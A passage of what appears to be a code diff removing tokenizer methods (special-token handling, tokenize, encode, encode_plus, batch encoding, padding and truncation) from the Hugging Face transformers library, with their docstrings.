already registered for provided pretrained models (ex: BertTokenizer cls_token is already registered to be '[CLS]' and XLM's one is also registered to be '') - - Args: - special_tokens_dict: dict of strings. Keys should be in the list of predefined special attributes: - [``bos_token``, ``eos_token``, ``unk_token``, ``sep_token``, ``pad_token``, ``cls_token``, ``mask_token``, - ``additional_special_tokens``]. - - Tokens are only added if they are not already in the vocabulary (tested by checking whether the tokenizer assigns the index of the ``unk_token`` to them). - - Returns: - Number of tokens added to the vocabulary. 
- - Examples:: - - # Let's see how to add a new classification token to GPT-2 - tokenizer = GPT2Tokenizer.from_pretrained('gpt2') - model = GPT2Model.from_pretrained('gpt2') - - special_tokens_dict = {'cls_token': ''} - - num_added_toks = tokenizer.add_special_tokens(special_tokens_dict) - print('We have added', num_added_toks, 'tokens') - model.resize_token_embeddings(len(tokenizer)) # Notice: resize_token_embeddings expects to receive the full size of the new vocabulary, i.e. the length of the tokenizer. - - assert tokenizer.cls_token == '' - """ - if not special_tokens_dict: - return 0 - - added_tokens = 0 - for key, value in special_tokens_dict.items(): - assert key in self.SPECIAL_TOKENS_ATTRIBUTES - if key == "additional_special_tokens": - assert isinstance(value, (list, tuple)) and all( - isinstance(t, str) for t in value - ) - added_tokens += self.add_tokens(value) - else: - assert isinstance(value, str) - added_tokens += self.add_tokens([value]) - logger.info("Assigning %s to the %s key of the tokenizer", value, key) - setattr(self, key, value) - - return added_tokens - - def tokenize(self, text, **kwargs): - """Converts a string into a sequence of tokens (strings), using the tokenizer. - Splits into words for word-based vocabularies or sub-words for sub-word-based - vocabularies (BPE/SentencePieces/WordPieces). - - Takes care of added tokens. - - text: The sequence to be encoded. - add_prefix_space: Only applies to GPT-2 and RoBERTa tokenizers. When `True`, this ensures that the sequence - begins with an empty space. False by default except for when using RoBERTa with `add_special_tokens=True`. - **kwargs: passed to the `prepare_for_tokenization` preprocessing method. 
- """ - all_special_tokens = self.all_special_tokens - text = self.prepare_for_tokenization(text, **kwargs) - - def lowercase_text(t): - # convert non-special tokens to lowercase - escaped_special_toks = [re.escape(s_tok) for s_tok in all_special_tokens] - pattern = r"(" + r"|".join(escaped_special_toks) + r")|" + r"(.+?)" - return re.sub(pattern, lambda m: m.groups()[0] or m.groups()[1].lower(), t) - - if self.init_kwargs.get("do_lower_case", False): - text = lowercase_text(text) - - def split_on_token(tok, text): - result = [] - split_text = text.split(tok) - for i, sub_text in enumerate(split_text): - sub_text = sub_text.rstrip() - if i == 0 and not sub_text: - result += [tok] - elif i == len(split_text) - 1: - if sub_text: - result += [sub_text] - else: - pass - else: - if sub_text: - result += [sub_text] - result += [tok] - return result - - def split_on_tokens(tok_list, text): - if not text.strip(): - return [] - if not tok_list: - return self._tokenize(text) - - tokenized_text = [] - text_list = [text] - for tok in tok_list: - tokenized_text = [] - for sub_text in text_list: - if sub_text not in self.unique_added_tokens_encoder: - tokenized_text += split_on_token(tok, sub_text) - else: - tokenized_text += [sub_text] - text_list = tokenized_text - - return list( - itertools.chain.from_iterable( - ( - self._tokenize(token) - if token not in self.unique_added_tokens_encoder - else [token] - for token in tokenized_text - ) - ) - ) - - added_tokens = self.unique_added_tokens_encoder - tokenized_text = split_on_tokens(added_tokens, text) - return tokenized_text - - def _tokenize(self, text, **kwargs): - """Converts a string in a sequence of tokens (string), using the tokenizer. - Split in words for word-based vocabulary or sub-words for sub-word-based - vocabularies (BPE/SentencePieces/WordPieces). - - Do NOT take care of added tokens. 
- """ - raise NotImplementedError - - def convert_tokens_to_ids(self, tokens): - """Converts a single token, or a sequence of tokens, (str) in a single integer id - (resp. a sequence of ids), using the vocabulary. - """ - if tokens is None: - return None - - if isinstance(tokens, str): - return self._convert_token_to_id_with_added_voc(tokens) - - ids = [] - for token in tokens: - ids.append(self._convert_token_to_id_with_added_voc(token)) - return ids - - def _convert_token_to_id_with_added_voc(self, token): - if token is None: - return None - - if token in self.added_tokens_encoder: - return self.added_tokens_encoder[token] - return self._convert_token_to_id(token) - - def _convert_token_to_id(self, token): - raise NotImplementedError - - def encode( - self, - text: str, - text_pair: Optional[str] = None, - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - **kwargs - ): - """ - Converts a string in a sequence of ids (integer), using the tokenizer and vocabulary. - - Same as doing ``self.convert_tokens_to_ids(self.tokenize(text))``. - - Args: - text (:obj:`str` or :obj:`List[str]`): - The first sequence to be encoded. This can be a string, a list of strings (tokenized string using - the `tokenize` method) or a list of integers (tokenized string ids using the `convert_tokens_to_ids` - method) - text_pair (:obj:`str` or :obj:`List[str]`, `optional`, defaults to :obj:`None`): - Optional second sequence to be encoded. This can be a string, a list of strings (tokenized - string using the `tokenize` method) or a list of integers (tokenized string ids using the - `convert_tokens_to_ids` method) - add_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`True`): - If set to ``True``, the sequences will be encoded with the special tokens relative - to their model. 
- max_length (:obj:`int`, `optional`, defaults to :obj:`None`): - If set to a number, will limit the total sequence returned so that it has a maximum length. - If there are overflowing tokens, those will be added to the returned dictionary - stride (:obj:`int`, `optional`, defaults to ``0``): - If set to a number along with max_length, the overflowing tokens returned will contain some tokens - from the main sequence returned. The value of this argument defines the number of additional tokens. - truncation_strategy (:obj:`str`, `optional`, defaults to `longest_first`): - String selected in the following options: - - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the - model's max length. The tokenizer padding sides are handled by the class attribute `padding_side` - which can be set to the following strings: - - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors (:obj:`str`, `optional`, defaults to :obj:`None`): - Can be set to 'tf' or 'pt' to return respectively TensorFlow :obj:`tf.constant` - or PyTorch :obj:`torch.Tensor` instead of a list of python integers. 
- **kwargs: passed to the `self.tokenize()` method - """ - encoded_inputs = self.encode_plus( - text, - text_pair=text_pair, - max_length=max_length, - add_special_tokens=add_special_tokens, - stride=stride, - truncation_strategy=truncation_strategy, - pad_to_max_length=pad_to_max_length, - return_tensors=return_tensors, - **kwargs, - ) - - return encoded_inputs["input_ids"] - - def encode_plus( - self, - text: str, - text_pair: Optional[str] = None, - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - return_offsets_mapping: bool = False, - **kwargs - ): - """ - Returns a dictionary containing the encoded sequence or sequence pair and additional information: - the mask for sequence classification and the overflowing elements if a ``max_length`` is specified. - - Args: - text (:obj:`str` or :obj:`List[str]`): - The first sequence to be encoded. This can be a string, a list of strings (tokenized string using - the `tokenize` method) or a list of integers (tokenized string ids using the `convert_tokens_to_ids` - method) - text_pair (:obj:`str` or :obj:`List[str]`, `optional`, defaults to :obj:`None`): - Optional second sequence to be encoded. This can be a string, a list of strings (tokenized - string using the `tokenize` method) or a list of integers (tokenized string ids using the - `convert_tokens_to_ids` method) - add_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`True`): - If set to ``True``, the sequences will be encoded with the special tokens relative - to their model. 
- max_length (:obj:`int`, `optional`, defaults to :obj:`None`): - If set to a number, will limit the total sequence returned so that it has a maximum length. - If there are overflowing tokens, those will be added to the returned dictionary - stride (:obj:`int`, `optional`, defaults to ``0``): - If set to a number along with max_length, the overflowing tokens returned will contain some tokens - from the main sequence returned. The value of this argument defines the number of additional tokens. - truncation_strategy (:obj:`str`, `optional`, defaults to `longest_first`): - String selected in the following options: - - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the - model's max length. The tokenizer padding sides are handled by the class attribute `padding_side` - which can be set to the following strings: - - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors (:obj:`str`, `optional`, defaults to :obj:`None`): - Can be set to 'tf' or 'pt' to return respectively TensorFlow :obj:`tf.constant` - or PyTorch :obj:`torch.Tensor` instead of a list of python integers. - return_token_type_ids (:obj:`bool`, `optional`, defaults to :obj:`None`): - Whether to return token type IDs. 
If left to the default, will return the token type IDs according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are token type IDs? <../glossary.html#token-type-ids>`_ - return_attention_mask (:obj:`bool`, `optional`, defaults to :obj:`None`): - Whether to return the attention mask. If left to the default, will return the attention mask according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are attention masks? <../glossary.html#attention-mask>`__ - return_overflowing_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return overflowing token information (default False). - return_special_tokens_mask (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return special tokens mask information (default False). - return_offsets_mapping (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return (char_start, char_end) for each token (default False). - If using Python's tokenizer, this method will raise NotImplementedError. This one is only available on - Rust-based tokenizers inheriting from PreTrainedTokenizerFast. 
- **kwargs: passed to the `self.tokenize()` method - - Return: - A Dictionary of shape:: - - { - input_ids: list[int], - token_type_ids: list[int] if return_token_type_ids is True (default) - attention_mask: list[int] if return_attention_mask is True (default) - overflowing_tokens: list[int] if a ``max_length`` is specified and return_overflowing_tokens is True - num_truncated_tokens: int if a ``max_length`` is specified and return_overflowing_tokens is True - special_tokens_mask: list[int] if ``add_special_tokens`` if set to ``True`` and return_special_tokens_mask is True - } - - With the fields: - - - ``input_ids``: list of token ids to be fed to a model - - ``token_type_ids``: list of token type ids to be fed to a model - - ``attention_mask``: list of indices specifying which tokens should be attended to by the model - - ``overflowing_tokens``: list of overflowing tokens if a max length is specified. - - ``num_truncated_tokens``: number of overflowing tokens a ``max_length`` is specified - - ``special_tokens_mask``: if adding special tokens, this is a list of [0, 1], with 0 specifying special added - tokens and 1 specifying sequence tokens. - """ - - def get_input_ids(text): - if isinstance(text, str): - tokens = self.tokenize( - text, add_special_tokens=add_special_tokens, **kwargs - ) - return self.convert_tokens_to_ids(tokens) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], str) - ): - return self.convert_tokens_to_ids(text) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], int) - ): - return text - else: - raise ValueError( - "Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers." - ) - - if return_offsets_mapping: - raise NotImplementedError( - "return_offset_mapping is not available when using Python tokenizers." - "To use this feature, change your tokenizer to one deriving from " - "transformers.PreTrainedTokenizerFast." 
- "More information on available tokenizers at " - "https://github.com/huggingface/transformers/pull/2674" - ) - - # Throw an error if we can pad because there is no padding token - if pad_to_max_length and self.pad_token_id is None: - raise ValueError( - "Unable to set proper padding strategy as the tokenizer does not have a padding token. In this case please set the `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` or add a new pad token via the function add_special_tokens if you want to use a padding strategy" - ) - - first_ids = get_input_ids(text) - second_ids = get_input_ids(text_pair) if text_pair is not None else None - - return self.prepare_for_model( - first_ids, - pair_ids=second_ids, - max_length=max_length, - pad_to_max_length=pad_to_max_length, - add_special_tokens=add_special_tokens, - stride=stride, - truncation_strategy=truncation_strategy, - return_tensors=return_tensors, - return_attention_mask=return_attention_mask, - return_token_type_ids=return_token_type_ids, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_mask, - ) - - def batch_encode_plus( - self, - batch_text_or_text_pairs: Union[str, List[str]], - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_masks: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_masks: bool = False, - return_offsets_mapping: bool = False, - return_input_lengths: bool = False, - **kwargs - ): - """ - Returns a dictionary containing the encoded sequence or sequence pair and additional information: - the mask for sequence classification and the overflowing elements if a ``max_length`` is specified. 
- - Args: - batch_text_or_text_pairs (:obj:`List[str]` or :obj:`List[List[str]]`): - Batch of sequences or pair of sequences to be encoded. - This can be a list of string/string-sequences/int-sequences or a list of pair of - string/string-sequences/int-sequence (see details in encode_plus) - add_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`True`): - If set to ``True``, the sequences will be encoded with the special tokens relative - to their model. - max_length (:obj:`int`, `optional`, defaults to :obj:`None`): - If set to a number, will limit the total sequence returned so that it has a maximum length. - If there are overflowing tokens, those will be added to the returned dictionary - stride (:obj:`int`, `optional`, defaults to ``0``): - If set to a number along with max_length, the overflowing tokens returned will contain some tokens - from the main sequence returned. The value of this argument defines the number of additional tokens. - truncation_strategy (:obj:`str`, `optional`, defaults to `longest_first`): - String selected in the following options: - - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the - model's max length. 
The tokenizer padding sides are handled by the class attribute `padding_side` - which can be set to the following strings: - - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors (:obj:`str`, `optional`, defaults to :obj:`None`): - Can be set to 'tf' or 'pt' to return respectively TensorFlow :obj:`tf.constant` - or PyTorch :obj:`torch.Tensor` instead of a list of python integers. - return_token_type_ids (:obj:`bool`, `optional`, defaults to :obj:`None`): - Whether to return token type IDs. If left to the default, will return the token type IDs according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are token type IDs? <../glossary.html#token-type-ids>`_ - return_attention_masks (:obj:`bool`, `optional`, defaults to :obj:`none`): - Whether to return the attention mask. If left to the default, will return the attention mask according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are attention masks? <../glossary.html#attention-mask>`__ - return_overflowing_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return overflowing token information (default False). - return_special_tokens_masks (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return special tokens mask information (default False). - return_offsets_mapping (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return (char_start, char_end) for each token (default False). - If using Python's tokenizer, this method will raise NotImplementedError. This one is only available on - Rust-based tokenizers inheriting from PreTrainedTokenizerFast. 
- return_input_lengths (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set the resulting dictionary will include the length of each sample - **kwargs: passed to the `self.tokenize()` method - - Return: - A Dictionary of shape:: - - { - input_ids: list[List[int]], - token_type_ids: list[List[int]] if return_token_type_ids is True (default) - attention_mask: list[List[int]] if return_attention_mask is True (default) - overflowing_tokens: list[List[int]] if a ``max_length`` is specified and return_overflowing_tokens is True - num_truncated_tokens: List[int] if a ``max_length`` is specified and return_overflowing_tokens is True - special_tokens_mask: list[List[int]] if ``add_special_tokens`` if set to ``True`` and return_special_tokens_mask is True - } - - With the fields: - - - ``input_ids``: list of token ids to be fed to a model - - ``token_type_ids``: list of token type ids to be fed to a model - - ``attention_mask``: list of indices specifying which tokens should be attended to by the model - - ``overflowing_tokens``: list of overflowing tokens if a max length is specified. - - ``num_truncated_tokens``: number of overflowing tokens a ``max_length`` is specified - - ``special_tokens_mask``: if adding special tokens, this is a list of [0, 1], with 0 specifying special added - tokens and 1 specifying sequence tokens. - """ - - def get_input_ids(text): - if isinstance(text, str): - tokens = self.tokenize( - text, add_special_tokens=add_special_tokens, **kwargs - ) - return self.convert_tokens_to_ids(tokens) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], str) - ): - return self.convert_tokens_to_ids(text) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], int) - ): - return text - else: - raise ValueError( - "Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers." 
- ) - - # Throw an error if we can pad because there is no padding token - if pad_to_max_length and self.pad_token_id is None: - raise ValueError( - "Unable to set proper padding strategy as the tokenizer does not have a padding token. In this case please set the `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` or add a new pad token via the function add_special_tokens if you want to use a padding strategy" - ) - - if return_offsets_mapping: - raise NotImplementedError( - "return_offset_mapping is not available when using Python tokenizers." - "To use this feature, change your tokenizer to one deriving from " - "transformers.PreTrainedTokenizerFast." - "More information on available tokenizers at " - "https://github.com/huggingface/transformers/pull/2674" - ) - - input_ids = [] - for ids_or_pair_ids in batch_text_or_text_pairs: - if isinstance(ids_or_pair_ids, (list, tuple)) and len(ids_or_pair_ids) == 2: - ids, pair_ids = ids_or_pair_ids - else: - ids, pair_ids = ids_or_pair_ids, None - - first_ids = get_input_ids(ids) - second_ids = get_input_ids(pair_ids) if pair_ids is not None else None - input_ids.append((first_ids, second_ids)) - - if max_length is None and pad_to_max_length: - - def total_sequence_length(input_pairs): - first_ids, second_ids = input_pairs - return len(first_ids) + ( - self.num_added_tokens() - if second_ids is None - else (len(second_ids) + self.num_added_tokens(pair=True)) - ) - - max_length = max([total_sequence_length(ids) for ids in input_ids]) - - batch_outputs = {} - for first_ids, second_ids in input_ids: - # Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by - # the model. 
It adds special tokens, truncates sequences if overflowing while taking into account - # the special tokens and manages a window stride for overflowing tokens - outputs = self.prepare_for_model( - first_ids, - pair_ids=second_ids, - max_length=max_length, - pad_to_max_length=pad_to_max_length, - add_special_tokens=add_special_tokens, - stride=stride, - truncation_strategy=truncation_strategy, - return_attention_mask=return_attention_masks, - return_token_type_ids=return_token_type_ids, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_masks, - ) - - # Append the non-padded length to the output - if return_input_lengths: - outputs["input_len"] = len(outputs["input_ids"]) - - for key, value in outputs.items(): - if key not in batch_outputs: - batch_outputs[key] = [] - batch_outputs[key].append(value) - - if return_tensors is not None: - - # Do the tensor conversion in batch - for key, value in batch_outputs.items(): - if return_tensors == "tf" and is_tf_available(): - try: - batch_outputs[key] = tf.constant(value) - except ValueError: - if None in [item for sequence in value for item in sequence]: - raise ValueError(self.NO_PAD_TOKEN_FOR_BATCH_MSG) - else: - raise ValueError(self.UNEVEN_SEQUENCES_FOR_BATCH_MSG) - elif return_tensors == "pt" and is_torch_available(): - try: - batch_outputs[key] = torch.tensor(value) - except ValueError: - raise ValueError(self.UNEVEN_SEQUENCES_FOR_BATCH_MSG) - except RuntimeError: - if None in [item for sequence in value for item in sequence]: - raise ValueError(self.NO_PAD_TOKEN_FOR_BATCH_MSG) - else: - raise - elif return_tensors is not None: - logger.warning( - "Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.".format( - return_tensors - ) - ) - - return batch_outputs - - def prepare_for_model( - self, - ids: List[int], - pair_ids: Optional[List[int]] = None, - max_length: Optional[int] = None, - add_special_tokens: bool = True, - stride: 
int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - ): - """ - Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by the model. - It adds special tokens, truncates - sequences if overflowing while taking into account the special tokens and manages a window stride for - overflowing tokens - - Args: - ids: list of tokenized input ids. Can be obtained from a string by chaining the - `tokenize` and `convert_tokens_to_ids` methods. - pair_ids: Optional second list of input ids. Can be obtained from a string by chaining the - `tokenize` and `convert_tokens_to_ids` methods. - max_length: maximum length of the returned list. Will truncate by taking into account the special tokens. - add_special_tokens: if set to ``True``, the sequences will be encoded with the special tokens relative - to their model. - stride: window stride for overflowing tokens. Can be useful for edge effect removal when using sequential - list of inputs. - truncation_strategy: string selected in the following options: - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length: if set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the model's max length. 
- The tokenizer padding sides are handled by the following strings: - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors: (optional) can be set to 'tf' or 'pt' to return respectively TensorFlow tf.constant - or PyTorch torch.Tensor instead of a list of python integers. - return_token_type_ids: (optional) Set to False to avoid returning token_type_ids (default True). - return_attention_mask: (optional) Set to False to avoid returning attention mask (default True) - return_overflowing_tokens: (optional) Set to True to return overflowing token information (default False). - return_special_tokens_mask: (optional) Set to True to return special tokens mask information (default False). - - Return: - A Dictionary of shape:: - - { - input_ids: list[int], - token_type_ids: list[int] if return_token_type_ids is True (default) - overflowing_tokens: list[int] if a ``max_length`` is specified and return_overflowing_tokens is True - num_truncated_tokens: int if a ``max_length`` is specified and return_overflowing_tokens is True - special_tokens_mask: list[int] if ``add_special_tokens`` if set to ``True`` and return_special_tokens_mask is True - } - - With the fields: - ``input_ids``: list of token ids to be fed to a model - ``token_type_ids``: list of token type ids to be fed to a model - - ``overflowing_tokens``: list of overflowing tokens if a max length is specified. - ``num_truncated_tokens``: number of overflowing tokens a ``max_length`` is specified - ``special_tokens_mask``: if adding special tokens, this is a list of [0, 1], with 0 specifying special added - tokens and 1 specifying sequence tokens. 
- """ - pair = bool(pair_ids is not None) - len_ids = len(ids) - len_pair_ids = len(pair_ids) if pair else 0 - - if return_token_type_ids is None: - return_token_type_ids = "token_type_ids" in self.model_input_names - if return_attention_mask is None: - return_attention_mask = "attention_mask" in self.model_input_names - - encoded_inputs = {} - - # Handle max sequence length - total_len = ( - len_ids - + len_pair_ids - + (self.num_added_tokens(pair=pair) if add_special_tokens else 0) - ) - if max_length and total_len > max_length: - ids, pair_ids, overflowing_tokens = self.truncate_sequences( - ids, - pair_ids=pair_ids, - num_tokens_to_remove=total_len - max_length, - truncation_strategy=truncation_strategy, - stride=stride, - ) - if return_overflowing_tokens: - encoded_inputs["overflowing_tokens"] = overflowing_tokens - encoded_inputs["num_truncated_tokens"] = total_len - max_length - - # Handle special_tokens - if add_special_tokens: - sequence = self.build_inputs_with_special_tokens(ids, pair_ids) - token_type_ids = self.create_token_type_ids_from_sequences(ids, pair_ids) - else: - sequence = ids + pair_ids if pair else ids - token_type_ids = [0] * len(ids) + ([1] * len(pair_ids) if pair else []) - - if return_special_tokens_mask: - if add_special_tokens: - encoded_inputs["special_tokens_mask"] = self.get_special_tokens_mask( - ids, pair_ids - ) - else: - encoded_inputs["special_tokens_mask"] = [0] * len(sequence) - - encoded_inputs["input_ids"] = sequence - if return_token_type_ids: - encoded_inputs["token_type_ids"] = token_type_ids - - if max_length and len(encoded_inputs["input_ids"]) > max_length: - encoded_inputs["input_ids"] = encoded_inputs["input_ids"][:max_length] - if return_token_type_ids: - encoded_inputs["token_type_ids"] = encoded_inputs["token_type_ids"][ - :max_length - ] - if return_special_tokens_mask: - encoded_inputs["special_tokens_mask"] = encoded_inputs[ - "special_tokens_mask" - ][:max_length] - - if max_length is None and 
len(encoded_inputs["input_ids"]) > self.max_len: - logger.warning( - "Token indices sequence length is longer than the specified maximum sequence length " - "for this model ({} > {}). Running this sequence through the model will result in " - "indexing errors".format(len(ids), self.max_len) - ) - - needs_to_be_padded = pad_to_max_length and ( - max_length - and len(encoded_inputs["input_ids"]) < max_length - or max_length is None - and len(encoded_inputs["input_ids"]) < self.max_len - and self.max_len <= 10000 - ) - - if pad_to_max_length and max_length is None and self.max_len > 10000: - logger.warning( - "Sequence can't be padded as no maximum length is specified and the model maximum length is too high." - ) - - if needs_to_be_padded: - difference = (max_length if max_length is not None else self.max_len) - len( - encoded_inputs["input_ids"] - ) - - if self.padding_side == "right": - if return_attention_mask: - encoded_inputs["attention_mask"] = [1] * len( - encoded_inputs["input_ids"] - ) + [0] * difference - if return_token_type_ids: - encoded_inputs["token_type_ids"] = ( - encoded_inputs["token_type_ids"] - + [self.pad_token_type_id] * difference - ) - if return_special_tokens_mask: - encoded_inputs["special_tokens_mask"] = ( - encoded_inputs["special_tokens_mask"] + [1] * difference - ) - encoded_inputs["input_ids"] = ( - encoded_inputs["input_ids"] + [self.pad_token_id] * difference - ) - elif self.padding_side == "left": - if return_attention_mask: - encoded_inputs["attention_mask"] = [0] * difference + [1] * len( - encoded_inputs["input_ids"] - ) - if return_token_type_ids: - encoded_inputs["token_type_ids"] = [ - self.pad_token_type_id - ] * difference + encoded_inputs["token_type_ids"] - if return_special_tokens_mask: - encoded_inputs["special_tokens_mask"] = [ - 1 - ] * difference + encoded_inputs["special_tokens_mask"] - encoded_inputs["input_ids"] = [ - self.pad_token_id - ] * difference + encoded_inputs["input_ids"] - - else: - raise 
ValueError("Invalid padding strategy:" + str(self.padding_side)) - - elif return_attention_mask: - encoded_inputs["attention_mask"] = [1] * len(encoded_inputs["input_ids"]) - - # Prepare inputs as tensors if asked - if return_tensors == "tf" and is_tf_available(): - encoded_inputs["input_ids"] = tf.constant([encoded_inputs["input_ids"]]) - - if "token_type_ids" in encoded_inputs: - encoded_inputs["token_type_ids"] = tf.constant( - [encoded_inputs["token_type_ids"]] - ) - - if "attention_mask" in encoded_inputs: - encoded_inputs["attention_mask"] = tf.constant( - [encoded_inputs["attention_mask"]] - ) - - elif return_tensors == "pt" and is_torch_available(): - encoded_inputs["input_ids"] = torch.tensor([encoded_inputs["input_ids"]]) - - if "token_type_ids" in encoded_inputs: - encoded_inputs["token_type_ids"] = torch.tensor( - [encoded_inputs["token_type_ids"]] - ) - - if "attention_mask" in encoded_inputs: - encoded_inputs["attention_mask"] = torch.tensor( - [encoded_inputs["attention_mask"]] - ) - elif return_tensors is not None: - logger.warning( - "Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.".format( - return_tensors - ) - ) - - return encoded_inputs - - def prepare_for_tokenization(self, text, **kwargs): - """Performs any necessary transformations before tokenization""" - return text - - def truncate_sequences( - self, - ids, - pair_ids=None, - num_tokens_to_remove=0, - truncation_strategy="longest_first", - stride=0, - ): - """Truncates a sequence pair in place to the maximum length. - truncation_strategy: string selected in the following options: - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences). - Overflowing tokens only contains overflow from the first sequence. - - 'only_first': Only truncate the first sequence. 
raise an error if the first sequence is shorter than or equal to num_tokens_to_remove. - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - """ - if num_tokens_to_remove <= 0: - return ids, pair_ids, [] - - if truncation_strategy == "longest_first": - overflowing_tokens = [] - for _ in range(num_tokens_to_remove): - if pair_ids is None or len(ids) > len(pair_ids): - overflowing_tokens = [ids[-1]] + overflowing_tokens - ids = ids[:-1] - else: - pair_ids = pair_ids[:-1] - window_len = min(len(ids), stride) - if window_len > 0: - overflowing_tokens = ids[-window_len:] + overflowing_tokens - elif truncation_strategy == "only_first": - assert len(ids) > num_tokens_to_remove - window_len = min(len(ids), stride + num_tokens_to_remove) - overflowing_tokens = ids[-window_len:] - ids = ids[:-num_tokens_to_remove] - elif truncation_strategy == "only_second": - assert pair_ids is not None and len(pair_ids) > num_tokens_to_remove - window_len = min(len(pair_ids), stride + num_tokens_to_remove) - overflowing_tokens = pair_ids[-window_len:] - pair_ids = pair_ids[:-num_tokens_to_remove] - elif truncation_strategy == "do_not_truncate": - raise ValueError( - "Input sequences are too long for max_length. Please select a truncation strategy." - ) - else: - raise ValueError( - "truncation_strategy should be selected in ['longest_first', 'only_first', 'only_second', 'do_not_truncate']" - ) - return (ids, pair_ids, overflowing_tokens) - - def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None): - if token_ids_1 is None: - return len(token_ids_0) * [0] - return [0] * len(token_ids_0) + [1] * len(token_ids_1) - - def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): - """ - Build model inputs from a sequence or a pair of sequences for sequence classification tasks - by concatenating and adding special tokens. 
